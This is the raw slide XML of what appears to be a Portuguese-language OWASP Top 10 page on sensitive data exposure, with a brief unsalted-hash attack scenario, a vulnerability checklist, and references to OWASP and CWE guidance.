              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cenário #3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> O banco de dados de senhas dos usuários usa hashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>simples (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsalted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>para armazenar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>as senhas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de todos. Uma falha de upload de arquivos permite que um atacante recupere o arquivo de senhas. Todos os hashes simples poderão ser expostos através de uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rainbow table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de hashes pré-calculados.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3733800"/>
            <a:ext cx="3383280" cy="255668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r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Estou vulnerável?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="300" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A primeira coisa que você deve determinar é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quais dados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>são sensíveis o suficiente para exigir proteção extra. Por exemplo, senhas, números de cartão de crédito, registros médicos e informações pessoais devem ser protegidas. Para todos esses dados:</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qualquer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>um desses dados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>é armazenado em texto claro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a longo prazo, incluindo backups de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dados?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Qualquer um desses dados é </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>transmitido em texto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>claro, internamente ou externamente? O tráfego de internet é especialmente perigoso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Algum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>algoritmo de criptografia utilizado é fraco ou defasado?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>As chaves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>criptográficas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>geradas são fracas, ou elas possuem um gerenciamento ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rodízio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de forma adequada?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Algumas diretivas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>de segurança do navegador ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cabeçalhos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>estão </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ausentes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>quando os dados sensíveis são </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fornecidos/enviados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ao navegador?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>um conjunto mais completo de problemas a serem evitados, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consulte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>áreas do ASVS de Criptografia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>(V7), Proteção de dados (V9), e SSL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>V10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6366680"/>
            <a:ext cx="3383280" cy="277732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r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Referências</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Para um conjunto mais completo de requisitos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>consulte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Requisitos do ASVS na Criptografia (V7), Proteção de Dados (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> Segurança das Comunicações (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Cryptographic Storage Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Password Storage Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Transport Layer Protection Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on SSL/TLS Testing</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externas</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CWE Entry 310 on Cryptographic Issues</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 312 on Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 319 on Cleartext Transmission of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 326 on Weak Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="900" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="3733800"/>
            <a:ext cx="3383280" cy="255668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r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Como faço para evitar?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Os perigos completos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>criptografia insegura, o uso de SSL e proteção de dados estão muito além do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escopo </a:t>
            </a:r>
            <a:r>
